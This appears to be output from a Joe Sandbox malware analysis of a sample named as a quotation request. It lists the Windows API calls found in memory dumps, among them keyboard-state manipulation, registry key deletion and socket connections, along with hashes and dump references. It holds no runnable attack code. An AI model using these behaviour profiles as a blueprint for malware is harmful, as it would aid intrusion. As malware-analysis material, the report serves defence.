                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                              • API String ID: 3522835683-2766056989
                                                                                                                                                                                                                              • Opcode ID: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
                                                                                                                                                                                                                              • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8b3da71be9337afea30d29a7ff14a4b93a0b57cf0db593304da16a2e435ab00b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00460F8C
                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00460FA1
                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00461002
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                                              • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                                                                                                                                                              • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00460DA5
                                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00460DBA
                                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00460E1B
                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                                              • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                                                                                                                                                              • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00B28311,?,00000000,?,00000000,00000000), ref: 00B27BDE
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00B27C59
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00B27C74
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00B27C9A
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,00B28311,00000000,?,?,?,?,?,?,?,?,?,00B28311,?), ref: 00B27CB9
                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00B28311,00000000,?,?,?,?,?,?,?,?,?,00B28311,?), ref: 00B27CF2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                                              • Opcode ID: 13de3b4d30c87d00b8f16dbb63a5e75490e96c52837d1999285b30872c66901a
                                                                                                                                                                                                                              • Instruction ID: 8939b42c6a9a0b1f560722d81acc76d49911ba07d9b6449ca3bf1eb59d9d68c9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13de3b4d30c87d00b8f16dbb63a5e75490e96c52837d1999285b30872c66901a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D51B7B09442159FCB10CFA8EC85AEEBBF4FF09310F1445AAE959E7291DB309941CFA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _wcsncpy$LocalTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2945705084-0
                                                                                                                                                                                                                              • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                                                                                                                                                              • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                                                                                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                              • String ID: ,,I$DllGetClassObject
                                                                                                                                                                                                                              • API String ID: 753597075-1683996018
                                                                                                                                                                                                                              • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                                                                                                                                                              • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 004872AA
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                                                                                                                                                                              • IsMenu.USER32(?), ref: 00487369
                                                                                                                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                                                                                                                                                                              • DrawMenuBar.USER32 ref: 004873C4
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 3866635326-4108050209
                                                                                                                                                                                                                              • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                                                                                              • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                                                                                                                                                                • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                                                                                                                                                                • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                                                                                                                                                                • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                                                                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 395352322-0
                                                                                                                                                                                                                              • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                                                                                              • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                                                                                                                                                                              • GetWindowLongW.USER32(00C54220,000000F0), ref: 0048631F
                                                                                                                                                                                                                              • GetWindowLongW.USER32(00C54220,000000F0), ref: 00486354
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                                                                                                              • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                                                                                              • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                                                                                                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                                                                                                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00476221
                                                                                                                                                                                                                              • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                                                                                                                                                                              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 910771015-0
                                                                                                                                                                                                                              • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                                                                                              • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                                                                                                                                                                • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                                                                                                                                                                • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                              • Opcode ID: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                                                                                                                                                              • Instruction ID: 4837c572468b061b20148283283cd62aa6e96b5405c17b40ad05b898919227a4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89b1357e1ee64075d60cbe96e93ddb663670d2e9d7f59c86534f55b80d263953
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B711D3B1110119BFEF109F64CC85EEB7F5DEF083A8F114115BA04A21A0D776AC21DBA8
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00B231DA: _free.LIBCMT ref: 00B23203
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B23264
                                                                                                                                                                                                                                • Part of subcall function 00B22096: HeapFree.KERNEL32(00000000,00000000,?,00B23208,?,00000000,?,00000000,?,00B2322F,?,00000007,?,?,00B22697,?), ref: 00B220AC
                                                                                                                                                                                                                                • Part of subcall function 00B22096: GetLastError.KERNEL32(?,?,00B23208,?,00000000,?,00000000,?,00B2322F,?,00000007,?,?,00B22697,?,?), ref: 00B220BE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2326F
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B2327A
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B232CE
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B232D9
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B232E4
                                                                                                                                                                                                                              • _free.LIBCMT ref: 00B232EF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1684174315.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_ae0000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                                              • Instruction ID: 79a76dea8f58a73ce881ef6dc0303450f082e951b982ec3c280a7ad31567f0ea
